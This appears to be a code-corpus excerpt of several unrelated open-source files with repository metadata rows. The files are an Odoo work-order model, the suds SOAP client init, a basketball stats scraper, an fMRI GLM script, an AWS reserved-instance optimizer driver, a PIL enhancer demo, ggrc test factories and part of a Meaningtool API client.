return self.write({'state': 'cancel'})
def action_replan(self):
"""Replan a work order.
It actually replans every "ready" or "pending"
work order of the linked manufacturing orders.
"""
for production in self.production_id:
production._plan_workorders(replan=True)
return True
def button_done(self):
if any(x.state in ('done', 'cancel') for x in self):
raise UserError(_('A Manufacturing Order is already done or cancelled.'))
self.end_all()
end_date = datetime.now()
return self.write({
'state': 'done',
'date_finished': end_date,
'date_planned_finished': end_date,
})
def button_scrap(self):
self.ensure_one()
return {
'name': _('Scrap'),
'view_mode': 'form',
'res_model': 'stock.scrap',
'view_id': self.env.ref('stock.stock_scrap_form_view2').id,
'type': 'ir.actions.act_window',
'context': {'default_company_id': self.production_id.company_id.id,
'default_workorder_id': self.id,
'default_production_id': self.production_id.id,
'product_ids': (self.production_id.move_raw_ids.filtered(lambda x: x.state not in ('done', 'cancel')) | self.production_id.move_finished_ids.filtered(lambda x: x.state == 'done')).mapped('product_id').ids},
'target': 'new',
}
def action_see_move_scrap(self):
self.ensure_one()
action = self.env.ref('stock.action_stock_scrap').read()[0]
action['domain'] = [('workorder_id', '=', self.id)]
return action
def action_open_wizard(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_workorder_mrp_production_form').read()[0]
action['res_id'] = self.id
return action
@api.depends('qty_production', 'qty_produced')
def _compute_qty_remaining(self):
for wo in self:
wo.qty_remaining = float_round(wo.qty_production - wo.qty_produced, precision_rounding=wo.production_id.product_uom_id.rounding)
def _get_duration_expected(self, alternative_workcenter=False):
self.ensure_one()
if not self.workcenter_id:
return False
qty_production = self.production_id.product_uom_id._compute_quantity(self.qty_production, self.production_id.product_id.uom_id)
cycle_number = float_round(qty_production / self.workcenter_id.capacity, precision_digits=0, rounding_method='UP')
if alternative_workcenter:
# TODO: find a better alternative: the workcenter settings can change
duration_expected_working = (self.duration_expected - self.workcenter_id.time_start - self.workcenter_id.time_stop) * self.workcenter_id.time_efficiency / (100.0 * cycle_number)
if duration_expected_working < 0:
duration_expected_working = 0
return alternative_workcenter.time_start + alternative_workcenter.time_stop + cycle_number * duration_expected_working * 100.0 / alternative_workcenter.time_efficiency
time_cycle = self.operation_id and self.operation_id.time_cycle or 60.0
return self.workcenter_id.time_start + self.workcenter_id.time_stop + cycle_number * time_cycle * 100.0 / self.workcenter_id.time_efficiency
def _get_conflicted_workorder_ids(self):
"""Get conlicted workorder(s) with self.
Conflict means having two workorders in the same time in the same workcenter.
:return: defaultdict with key as workorder id of self and value as related conflicted workorder
"""
self.flush(['state', 'date_planned_start', 'date_planned_finished', 'workcenter_id'])
sql = """
SELECT wo1.id, wo2.id
FROM mrp_workorder wo1, mrp_workorder wo2
WHERE
wo1.id IN %s
AND wo1.state IN ('pending','ready')
AND wo2.state IN ('pending','ready')
AND wo1.id != wo2.id
AND wo1.workcenter_id = wo2.workcenter_id
AND (DATE_TRUNC('second', wo2.date_planned_start), DATE_TRUNC('second', wo2.date_planned_finished))
OVERLAPS (DATE_TRUNC('second', wo1.date_planned_start), DATE_TRUNC('second', wo1.date_planned_finished))
"""
self.env.cr.execute(sql, [tuple(self.ids)])
res = defaultdict(list)
for wo1, wo2 in self.env.cr.fetchall():
res[wo1].append(wo2)
return res
@api.model
def _prepare_component_quantity(self, move, qty_producing):
""" helper that computes quantity to consume (or to create in case of byproduct)
depending on the quantity producing and the move's unit factor"""
if move.product_id.tracking == 'serial':
uom = move.product_id.uom_id
else:
uom = move.product_uom
return move.product_uom._compute_quantity(
qty_producing * move.unit_factor,
uom,
round=False
)
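# Worked example (illustrative values, not from the original module):
# producing qty_producing = 5.0 units with move.unit_factor = 2.0 gives
# 5.0 * 2.0 = 10.0, which is then converted from move.product_uom into
# `uom` with round=False so the caller decides how to round. For
# serial-tracked products `uom` is the product's own unit, so each
# serial number maps to exactly one unit.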
def _update_finished_move(self):
""" Update the finished move & move lines in order to set the finished
product lot on it as well as the produced quantity. This method gets the
information either from the last workorder or from the Produce wizard."""
production_move = self.production_id.move_finished_ids.filtered(
lambda move: move.product_id == self.product_id and
move.state not in ('done', 'cancel')
)
if production_move and production_move.product_id.tracking != 'none':
if not self.finished_lot_id:
raise UserError(_('You need to provide a lot for the finished product.'))
move_line = production_move.move_line_ids.filtered(
lambda line: line.lot_id.id == self.finished_lot_id.id
)
if move_line:
if self.product_id.tracking == 'serial':
raise UserError(_('You cannot produce the same serial number twice.'))
move_line.product_uom_qty += self.qty_producing
move_line.qty_done += self.qty_producing
else:
location_dest_id = production_move.location_dest_id._get_putaway_strategy(self.product_id).id or production_move.location_dest_id.id
move_line.create({
'move_id': production_move.id,
'product_id': production_move.product_id.id,
'lot_id': self.finished_lot_id.id,
'product_uom_qty': self.qty_producing,
'product_uom_id': self.product_uom_id.id,
'qty_done': self.qty_producing,
'location_id': production_move.location_id.id,
'location_dest_id': location_dest_id,
})
else:
rounding = production_move.product_uom.rounding
production_move._set_quantity_done(
float_round(self.qty_producing, precision_rounding=rounding)
)
def _strict_consumption_check(self):
if self.consumption == 'strict':
for move in self.move_raw_ids:
qty_done = 0.0
for line in move.move_line_ids:
qty_done += line.product_uom_id._compute_quantity(line.qty_done, move.product_uom)
rounding = move.product_uom_id.rounding
if float_compare(qty_done, move.product_uom_qty, precision_rounding=rounding) != 0:
raise UserError(_('You should consume the quantity of %s defined in the BoM. If you want to consume more or less components, change the consumption setting on the BoM.', move.product_id.name))
def _check_sn_uniqueness(self):
""" Alert the user if the serial number as already been produced """
if self.product_tracking == 'serial' and self.finished_lot_id:
sml = self.env['stock.move.line'].search_count([
('lot_id', '=', self.finished_lot_id.id),
('location_id.usage', '=', 'production'),
('qty_done', '=', 1),
('state', '=', 'done')
])
if sml:
raise UserError(_('This serial number for product %s has already been produced', self.product_id.name))
|
agpl-3.0
| 3,872,464,057,137,297,000
| 50.708877
| 230
| 0.601883
| false
| 3.934148
| false
| false
| false
|
blakev/suds
|
suds/__init__.py
|
1
|
4404
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Suds is a lightweight SOAP python client that provides a
service proxy for Web Services.
"""
import os
import sys
#
# Project properties
#
__version__ = '0.4.unomena.2'
__build__="GA R699-20100913"
#
# Exceptions
#
class MethodNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Method not found: '%s'" % name)
class PortNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Port not found: '%s'" % name)
class ServiceNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Service not found: '%s'" % name)
class TypeNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Type not found: '%s'" % tostr(name))
class BuildError(Exception):
msg = \
"""
An error occurred while building an instance of (%s). As a result
the object you requested could not be constructed. It is recommended
that you construct the type manually using a Suds object.
Please open a ticket with a description of this error.
Reason: %s
"""
def __init__(self, name, exception):
Exception.__init__(self, BuildError.msg % (name, exception))
class SoapHeadersNotPermitted(Exception):
msg = \
"""
Method (%s) was invoked with SOAP headers. The WSDL does not
define SOAP headers for this method. Retry without the soapheaders
keyword argument.
"""
def __init__(self, name):
Exception.__init__(self, self.msg % name)
class WebFault(Exception):
def __init__(self, fault, document):
if hasattr(fault, 'faultstring'):
Exception.__init__(self, "Server raised fault: '%s'" % fault.faultstring)
self.fault = fault
self.document = document
#
# Logging
#
class Repr:
def __init__(self, x):
self.x = x
def __str__(self):
return repr(self.x)
#
# Utility
#
def tostr(object, encoding=None):
""" get a unicode safe string representation of an object """
if isinstance(object, basestring):
if encoding is None:
return object
else:
return object.encode(encoding)
if isinstance(object, tuple):
s = ['(']
for item in object:
if isinstance(item, basestring):
s.append(item)
else:
s.append(tostr(item))
s.append(', ')
s.append(')')
return ''.join(s)
if isinstance(object, list):
s = ['[']
for item in object:
if isinstance(item, basestring):
s.append(item)
else:
s.append(tostr(item))
s.append(', ')
s.append(']')
return ''.join(s)
if isinstance(object, dict):
s = ['{']
for item in object.items():
if isinstance(item[0], basestring):
s.append(item[0])
else:
s.append(tostr(item[0]))
s.append(' = ')
if isinstance(item[1], basestring):
s.append(item[1])
else:
s.append(tostr(item[1]))
s.append(', ')
s.append('}')
return ''.join(s)
try:
return unicode(object)
except:
return str(object)
class null:
"""
The I{null} object.
Used to pass NULL for optional XML nodes.
"""
pass
def objid(obj):
return obj.__class__.__name__\
+':'+hex(id(obj))
import client
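# Usage sketch (illustrative, not part of the original module; the WSDL
# URL and the GetQuote method are placeholders, the rest is the public
# suds API):
#
#   from suds.client import Client
#   from suds import WebFault, tostr
#
#   client = Client('http://example.com/service?wsdl')
#   try:
#       print client.service.GetQuote('IBM')
#   except WebFault, f:
#       print tostr(f.fault)  # unicode-safe dump of the SOAP fault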
|
lgpl-3.0
| -8,721,852,589,140,907,000
| 27.597403
| 85
| 0.581971
| false
| 3.97832
| false
| false
| false
|
meprogrammerguy/pyMadness
|
scrape_stats.py
|
1
|
2098
|
#!/usr/bin/env python3
from urllib.request import urlopen
from bs4 import BeautifulSoup
import pandas as pd
import html5lib
import pdb
from collections import OrderedDict
import json
import csv
import contextlib
url = "https://kenpom.com/index.php"
#url = "https://kenpom.com/index.php?y=2017" #past year testing override
print ("Scrape Statistics Tool")
print ("**************************")
print ("data is from {0}".format(url))
print ("**************************")
with contextlib.closing(urlopen(url)) as page:
soup = BeautifulSoup(page, "html5lib")
ratings_table=soup.find('table', id='ratings-table')
IDX=[]
A=[]
B=[]
C=[]
D=[]
E=[]
F=[]
G=[]
H=[]
I=[]
J=[]
K=[]
L=[]
M=[]
index=0
for row in ratings_table.findAll("tr"):
col=row.findAll('td')
if len(col)>0:
index+=1
IDX.append(index)
A.append(col[0].find(text=True))
B.append(col[1].find(text=True))
C.append(col[2].find(text=True))
D.append(col[3].find(text=True))
E.append(col[4].find(text=True))
F.append(col[5].find(text=True))
G.append(col[7].find(text=True))
H.append(col[9].find(text=True))
I.append(col[11].find(text=True))
J.append(col[13].find(text=True))
K.append(col[15].find(text=True))
L.append(col[17].find(text=True))
M.append(col[19].find(text=True))
df=pd.DataFrame(IDX,columns=['Index'])
df['Rank']=A
df['Team']=B
df['Conf']=C
df['W-L']=D
df['AdjEM']=E
df['AdjO']=F
df['AdjD']=G
df['AdjT']=H
df['Luck']=I
df['AdjEMSOS']=J
df['OppOSOS']=K
df['OppDSOS']=L
df['AdjEMNCSOS']=M
with open('stats.json', 'w') as f:
f.write(df.to_json(orient='index'))
with open("stats.json") as stats_json:
dict_stats = json.load(stats_json, object_pairs_hook=OrderedDict)
stats_sheet = open('stats.csv', 'w', newline='')
csvwriter = csv.writer(stats_sheet)
count = 0
for row in dict_stats.values():
#pdb.set_trace()
if (count == 0):
header = row.keys()
csvwriter.writerow(header)
count += 1
csvwriter.writerow(row.values())
stats_sheet.close()
print ("done.")
|
mit
| -3,005,067,790,104,389,600
| 22.054945
| 72
| 0.609152
| false
| 2.838972
| false
| false
| false
|
berkeley-stat159/project-alpha
|
code/utils/scripts/glm_script.py
|
1
|
3957
|
""" Script for GLM functions.
Run with:
python glm_script.py
"""
# Loading modules.
from __future__ import absolute_import, division, print_function
import numpy as np
import matplotlib.pyplot as plt
import nibabel as nib
import os
import sys
# Relative paths to subject 1 data.
project_path = "../../../"
pathtodata = project_path + "data/ds009/sub001/"
condition_location = pathtodata+"model/model001/onsets/task001_run001/"
location_of_images = project_path+"images/"
location_of_functions = project_path+"code/utils/functions/"
sys.path.append(location_of_functions)
# Load events2neural from the stimuli module.
from stimuli import events2neural
from event_related_fMRI_functions import hrf_single, convolution_specialized
# Load our GLM functions.
from glm import glm, glm_diagnostics, glm_multiple
# Load the image data for subject 1.
img = nib.load(pathtodata+"BOLD/task001_run001/bold.nii.gz")
data = img.get_data()
data = data[...,6:] # Knock off the first 6 observations.
cond1=np.loadtxt(condition_location+"cond001.txt")
cond2=np.loadtxt(condition_location+"cond002.txt")
cond3=np.loadtxt(condition_location+"cond003.txt")
#######################
# a. (my) convolution #
#######################
all_stimuli=np.array(sorted(list(cond2[:,0])+list(cond3[:,0])+list(cond1[:,0]))) # could also just x_s_array
my_hrf = convolution_specialized(all_stimuli,np.ones(len(all_stimuli)),hrf_single,np.linspace(0,239*2-2,239))
##################
# b. np.convolve #
##################
# initial needed values
TR = 2
tr_times = np.arange(0, 30, TR)
hrf_at_trs = np.array([hrf_single(x) for x in tr_times])
n_vols=data.shape[-1]
# creating the .txt file for the events2neural function
cond_all=np.row_stack((cond1,cond2,cond3))
cond_all=sorted(cond_all,key= lambda x:x[0])
np.savetxt(condition_location+"cond_all.txt",cond_all)
neural_prediction = events2neural(condition_location+"cond_all.txt",TR,n_vols)
convolved = np.convolve(neural_prediction, hrf_at_trs) # hrf_at_trs sample data
N = len(neural_prediction) # N == n_vols == 173
M = len(hrf_at_trs) # M == 15, since np.arange(0, 30, 2) has 15 samples
np_hrf=convolved[:N]
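# Note: np.convolve in its default 'full' mode returns a signal of length
# N + M - 1, so the last M - 1 samples spill past the end of the run;
# slicing convolved[:N] trims the prediction back to n_vols.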
#############################
#############################
# Analysis and diagonistics #
#############################
#############################
#######################
# a. (my) convolution #
#######################
# Now get the estimated coefficients and design matrix for doing
# regression on the convolved time course.
B_my, X_my = glm(data, my_hrf)
# Some diagnostics.
MRSS_my, fitted_my, residuals_my = glm_diagnostics(B_my, X_my, data)
# Print out the mean MRSS.
print("MRSS using 'my' convolution function: "+str(np.mean(MRSS_my)))
# Plot the time course for a single voxel with the fitted values.
# Looks pretty bad.
plt.plot(data[41, 47, 2]) #change from cherry-picking
plt.plot(fitted_my[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_my.png")
plt.close()
##################
# b. np.convolve #
##################
# Now get the estimated coefficients and design matrix for doing
# regression on the convolved time course.
B_np, X_np = glm(data, np_hrf)
# Some diagnostics.
MRSS_np, fitted_np, residuals_np = glm_diagnostics(B_np, X_np, data)
# Print out the mean MRSS.
print("MRSS using np convolution function: "+str(np.mean(MRSS_np)))
# Plot the time course for a single voxel with the fitted values.
# Looks pretty bad.
plt.plot(data[41, 47, 2])
plt.plot(fitted_np[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_np.png")
plt.close()
X_my3=np.ones((data.shape[-1],4))
for i in range(3):
X_my3[:,i+1]=my_hrf**(i+1)
B_my3, X_my3 = glm_multiple(data, X_my3)
MRSS_my3, fitted_my3, residuals_my3 = glm_diagnostics(B_my3, X_my3, data)
print("MRSS using 'my' convolution function, 3rd degree polynomial: "+str(np.mean(MRSS_my3))+ ", but the chart looks better")
plt.plot(data[41, 47, 2])
plt.plot(fitted_my3[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_my3.png")
plt.close()
|
bsd-3-clause
| -381,920,970,145,549,500
| 28.75188
| 125
| 0.664645
| false
| 2.854978
| false
| false
| false
|
dbatalov/ri-optimizer
|
example_main.py
|
1
|
9032
|
"""
This is the main example script to execute, it is meant as an example
of how the riptimize.py module is to be used, and effectivey acts as
the driver of the module with rudimentary console UI + CSV report
generation and S3 upload. It's job is to demonstrate the functionality
of riptimize and it is not meant to execute in production as is.
The step-by-step instructions as to how to execute this script is
embedded in comments below labeled with STEP X OF X.
"""
import riptimize
import datetime
import csv
import boto
def main():
print "Example Riptimize Driver"
print
# 1. setup
# STEP 1 of 7: specify region
region = 'us-east-1'
# STEP 2 of 7: set the RI holding account id and credentials
ri_account_id = 'RIRI-RIRI-RIRI' # replace with actual AWS Account ID
ri_account_credentials = ('<access-key-id-ri>', '<secret_access-key-ri>')
all_accounts = {ri_account_id: ri_account_credentials}
# STEP 3 of 7: add ids and credentials for all other linked accounts, at first just add a couple other accounts
# all_accounts['AAAA-AAAA-AAAA'] = ('<access-key-id-a>', '<secret-access-key-a>')
# all_accounts['BBBB-BBBB-BBBB'] = ('<access-key-id-b>', '<secret-access-key-b>')
# ...
# all_accounts['ZZZZ-ZZZZ-ZZZZ'] = ('<access-key-id-z>', '<secret-access-key-z>')
# STEP 4 of 7: For the first few tests this should be set to False
# once you see that the script is running, change to True to actually execute RI modifications
optimize = False # if False, means a DRY-RUN
# STEP 5 of 7: Leaving as True will publish RI surplus metrics to CloudWatch
publish_metrics = True # custom metrics are created in AWS CloudWatch
# STEP 6 of 7: Leaving as True will upload the CSV report to S3 for safekeeping
upload_report = True # CSV reports will be saved in S3 in s3_report_bucket
s3_report_bucket = "riptimize-reports-%s" % ri_account_id
# 2. do it
# STEP 7 of 7: Ok, you are ready to go, just execute on the command line % python example_main.py
riptimize_result_tuple = riptimize.riptimize(all_accounts, ri_account_credentials, region, optimize, publish_metrics)
# 3. show results
i_inventory, i_inventory_by_account, ri_inventory, supported_ri_zones, processing_modifications, clean_mismatch, recommendations, plan, modification_ids = riptimize_result_tuple
time_now = datetime.datetime.utcnow()
print "Report for region %s as of %s" % (region, time_now)
print
# 3.1 print on-demand instance inventory
print "Instance Inventory by account:"
print i_inventory_by_account
print
print "Aggregate instance inventory:"
print i_inventory
print
# 3.2 print RI inventory
print "RI Inventory:"
print ri_inventory
print
# 3.3 show all supported AZs in the RI holding account
print "Supported RI zones: " + str(supported_ri_zones)
# 3.4 show if previous modifications are still being executed
modifications_inflight = len(processing_modifications) != 0
if modifications_inflight:
print
print "======--- WARNING ---======"
print "Previous modifications are still processing:"
for mod in processing_modifications:
print "modification_id: %s, status: %s" % (mod.modification_id, mod.status)
print "!!! RI optimizations cannot be performed until previous modifications are completed"
print "!!! RI inventory and recommendations will also be potentially incorrect"
print
# 3.5 print detected mismatches between numbers of on-demand running instances and RIs by availability zone and instance type
if len(clean_mismatch) > 0:
print "On-demand/RI inventory mismatches per availability zone:"
print clean_mismatch
else:
print "No On-demand/RI inventory mimatches detected in any availability zones:"
print
# 3.6 print recommendations for migrating running instances into AZs covered by RI holding account, purchasing additional RIs or launching additional instances to get better RI utilization
eliminated_i_inventory, ri_imbalance = recommendations
if len(eliminated_i_inventory) == 0 and len(ri_imbalance) == 0:
print "No recomendations available"
else:
print "Recommendations:"
if len(eliminated_i_inventory) > 0:
print "\tOn-demand instances running in zones not supported by RIs. Migrate them to supported zones:"
print "\t" + str(eliminated_i_inventory)
print
if len(ri_imbalance) > 0:
print "\tOn-demand/RI imbalance detected!"
print "\tNegative numbers indicate additional RIs needed, positive ones indicate that RIs are underutilized and more instances can be launched:"
print "\t" + str(ri_imbalance)
print
# 3.7 print high-level optimization plan if one is possible, showing how many RIs need to be moved to which AZs
if len(plan) == 0:
print "No RI redistribution is possible."
else:
print "RI Optimization possible! Plan: " + str(plan)
if optimize:
if modifications_inflight:
print "Previous optimizations are still processing, new optimizations kicked off in DRY-RUN mode only!"
else:
print "Optimize option selected, optimizations kicked-off..."
else:
print "Optimize flag not set, so optimizations kicked off in DRY-RUN mode only!"
print
# 3.8 finally, if optimizations were actually kicked off, list all modification ids, or fake ones in case of a dry run
print "Initiated optimizations:"
print modification_ids
filename_safe_timestamp = str(time_now).replace(' ','_').replace(':', '-')
report_file_name = "riptimize_report_%s_%s.csv" % (region, filename_safe_timestamp)
csv_report(report_file_name, time_now, region, i_inventory_by_account, ri_inventory, clean_mismatch, plan, modification_ids)
print
print "CSV report written to %s" % report_file_name
if upload_report:
upload_report_to_s3(ri_account_credentials, report_file_name, s3_report_bucket)
print
print "Report uploaded to S3 as %s/%s of RI holding account %s" % (s3_report_bucket, report_file_name, ri_account_id)
print
print "Done"
# example of generating a CSV report
def csv_report(csv_file_name, time_now, region, i_inventory_by_account, ri_inventory, clean_mismatch, plan, modification_ids):
with open(csv_file_name, 'wb') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(["Report for region %s at %s" % (region, str(time_now))])
# write instance inventory report
writer.writerow([])
writer.writerow(['Instance Inventory'])
writer.writerow(['Account ID', 'Instance Type', 'Availability Zone', 'Count'])
for account_id, inventory_for_account in i_inventory_by_account.items():
for (itype, az), count in inventory_for_account.items():
writer.writerow([account_id, itype, az, count])
# write RI inventory report
writer.writerow([])
writer.writerow(['RI Inventory'])
writer.writerow(['Instance Type', 'Availability Zone', 'Count'])
for (itype, az), count in ri_inventory.items():
writer.writerow([itype, az, count])
# write report on On-demand/RI inventory mismatches
writer.writerow([])
writer.writerow(['On-demand/RI inventory mismatches per availability zone'])
writer.writerow(['Instance Type', 'Availability Zone', 'Diff'])
for (itype, az), count in clean_mismatch.items():
writer.writerow([itype, az, count])
# write optimization plan
writer.writerow([])
writer.writerow(['RI modification plan'])
writer.writerow(['Instance Type', 'Source AZ', 'Destination AZ', 'Count'])
for itype, source_az, dest_az, count in plan:
writer.writerow([itype, source_az, dest_az, count])
# write modification_ids
writer.writerow([])
writer.writerow(['Kicked off RI modifications'])
writer.writerow(['Modification ID'])
for modification_id in modification_ids:
writer.writerow([modification_id])
def upload_report_to_s3(ri_account_credentials, report_file_name, s3_report_bucket):
access_key_id, secret_access_key = ri_account_credentials
s3 = boto.connect_s3(aws_access_key_id=access_key_id, aws_secret_access_key=secret_access_key)
# create bucket if does not exist
bucket = s3.lookup(s3_report_bucket)
if not bucket:
bucket = s3.create_bucket(s3_report_bucket)
# upload the report
key = bucket.new_key(report_file_name)
key.set_contents_from_filename(report_file_name)
s3.close()
if __name__ == '__main__':
main()
|
bsd-2-clause
| -7,441,872,143,540,658,000
| 46.042553
| 192
| 0.660762
| false
| 3.884731
| false
| false
| false
|
EKiefer/edge-starter
|
py34env/Scripts/enhancer.py
|
1
|
1558
|
#!c:\users\ekiefer\projects\django\my_edge\py34env\scripts\python.exe
#
# The Python Imaging Library
# $Id$
#
# this demo script creates four windows containing an image and a slider.
# drag the slider to modify the image.
#
try:
from tkinter import Tk, Toplevel, Frame, Label, Scale, HORIZONTAL
except ImportError:
from Tkinter import Tk, Toplevel, Frame, Label, Scale, HORIZONTAL
from PIL import Image, ImageTk, ImageEnhance
import sys
#
# enhancer widget
class Enhance(Frame):
def __init__(self, master, image, name, enhancer, lo, hi):
Frame.__init__(self, master)
# set up the image
self.tkim = ImageTk.PhotoImage(image.mode, image.size)
self.enhancer = enhancer(image)
self.update("1.0") # normalize
# image window
Label(self, image=self.tkim).pack()
# scale
s = Scale(self, label=name, orient=HORIZONTAL,
from_=lo, to=hi, resolution=0.01,
command=self.update)
s.set(self.value)
s.pack()
def update(self, value):
self.value = eval(value)
self.tkim.paste(self.enhancer.enhance(self.value))
#
# main
root = Tk()
im = Image.open(sys.argv[1])
im.thumbnail((200, 200))
Enhance(root, im, "Color", ImageEnhance.Color, 0.0, 4.0).pack()
Enhance(Toplevel(), im, "Sharpness", ImageEnhance.Sharpness, -2.0, 2.0).pack()
Enhance(Toplevel(), im, "Brightness", ImageEnhance.Brightness, -1.0, 3.0).pack()
Enhance(Toplevel(), im, "Contrast", ImageEnhance.Contrast, -1.0, 3.0).pack()
root.mainloop()
|
mit
| 8,260,503,957,191,499,000
| 25.40678
| 80
| 0.646341
| false
| 3.103586
| false
| false
| false
|
prasannav7/ggrc-core
|
test/integration/ggrc/models/factories.py
|
1
|
4323
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: urban@reciprocitylabs.com
"""Factories for models"""
import random
import factory
from ggrc import db
from ggrc import models
def random_string(prefix=''):
return '{prefix}{suffix}'.format(
prefix=prefix,
suffix=random.randint(0, 9999999999),
)
class ModelFactory(factory.Factory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
# modified_by_id = 1
@classmethod
def _create(cls, target_class, *args, **kwargs):
instance = target_class(*args, **kwargs)
db.session.add(instance)
db.session.commit()
return instance
class TitledFactory(factory.Factory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
title = factory.LazyAttribute(lambda m: random_string('title'))
class DirectiveFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Directive
class ControlFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Control
directive = factory.SubFactory(DirectiveFactory)
kind_id = None
version = None
documentation_description = None
verify_frequency_id = None
fraud_related = None
key_control = None
active = None
notes = None
class AssessmentFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Assessment
class ControlCategoryFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.ControlCategory
name = factory.LazyAttribute(lambda m: random_string('name'))
lft = None
rgt = None
scope_id = None
depth = None
required = None
class CategorizationFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Categorization
category = None
categorizable = None
category_id = None
categorizable_id = None
categorizable_type = None
class ProgramFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Program
title = factory.LazyAttribute(lambda _: random_string("program_title"))
slug = factory.LazyAttribute(lambda _: random_string(""))
class AuditFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Audit
title = factory.LazyAttribute(lambda _: random_string("title"))
slug = factory.LazyAttribute(lambda _: random_string(""))
status = "Planned"
program_id = factory.LazyAttribute(lambda _: ProgramFactory().id)
class ContractFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Contract
class EventFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Event
revisions = []
class RelationshipFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Relationship
source = None
destination = None
class RelationshipAttrFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.RelationshipAttr
relationship_id = None
attr_name = None
attr_value = None
class PersonFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Person
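# Usage sketch (illustrative, not part of the original module; assumes a
# test case with a database session, since ModelFactory._create commits):
#
#   control = ControlFactory()            # Control with a random title
#   audit = AuditFactory()                # also creates the linked Program
#   rel = RelationshipFactory(source=control, destination=audit)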
|
apache-2.0
| -2,486,109,641,783,697,400
| 23.844828
| 78
| 0.734906
| false
| 3.575682
| false
| false
| false
|
k0001/meaningtoolws
|
meaningtoolws/ct.py
|
1
|
4944
|
# -*- coding: utf-8 -*-
# Copyright (c) 2009, Popego Corporation <contact [at] popego [dot] com>
# All rights reserved.
#
# This file is part of the Meaningtool Web Services Python Client project
#
# See the COPYING file distributed with this project for its licensing terms.
"""
Meaningtool Category Tree REST API v0.1 client
Official documentation for the REST API v0.1 can be found at
http://meaningtool.com/docs/ws/ct/restv0.1
"""
import re
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
MT_BASE_URL = u"http://ws.meaningtool.com/ct/restv0.1"
_re_url = re.compile(ur"^https?://.+$")
class Result(object):
def __init__(self, status_errcode, status_message, data):
super(Result, self).__init__()
self.status_errcode = status_errcode
self.status_message = status_message
self.data = data
def __repr__(self):
return u"<%s - %s>" % (self.__class__.__name__, self.status_message)
class ResultError(Result, Exception):
def __init__(self, status_errcode, status_message, data):
Result.__init__(self, status_errcode, status_message, data)
Exception.__init__(self, u"%s: %s" % (status_errcode, status_message))
def __repr__(self):
return u"<%s - %s: %s>" % (self.__class__.__name__, self.status_errcode, self.status_message)
class Client(object):
def __init__(self, ct_key):
self.ct_key = ct_key
self._base_url = u"%s/%s" % (MT_BASE_URL, ct_key)
def __repr__(self):
return u"<%s - ct_key: %s>" % (self.__class__.__name__, self.ct_key)
def _req_base(self, method, url, data, headers):
if method == "GET":
req = urllib2.Request(u"%s?%s" % (url, urllib.urlencode(data)))
elif method == "POST":
req = urllib2.Request(url, urllib.urlencode(data))
else:
raise ValueError(u"HTTP Method '%s' not supported" % method)
req.add_header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
req.add_header("Accept-Charset", "UTF-8")
for k,v in headers:
req.add_header(k, v)
try:
resp = urllib2.urlopen(req)
except urllib2.HTTPError, e:
if e.code >= 500:
raise
resp = e
s = resp.read()
return s
def _req_json(self, method, url, data, headers):
url += u'.json'
headers.append(("Accept", "application/json"))
return self._req_base(method, url, data, headers)
def _parse_result_base(self, result_dict):
status = result_dict["status"]
status_errcode = result_dict["errno"]
status_message = result_dict["message"]
data = result_dict["data"]
if status == "ok":
return Result(status_errcode, status_message, data)
else:
raise ResultError(status_errcode, status_message, data)
def _parse_result_json(self, raw):
return self._parse_result_base(json.loads(raw, encoding="utf8"))
# default request/parse methods
_req = _req_json
_parse_result = _parse_result_json
def get_categories(self, source, input, url_hint=None, additionals=None, content_language=None):
url = u"%s/categories" % self._base_url
data = {}
headers = []
data["source"] = source.encode("utf8")
data["input"] = input.encode("utf8")
if url_hint:
if not _re_url.match(url_hint):
raise ValueError(u"url_hint")
data["url_hint"] = url_hint.encode("utf8")
if additionals:
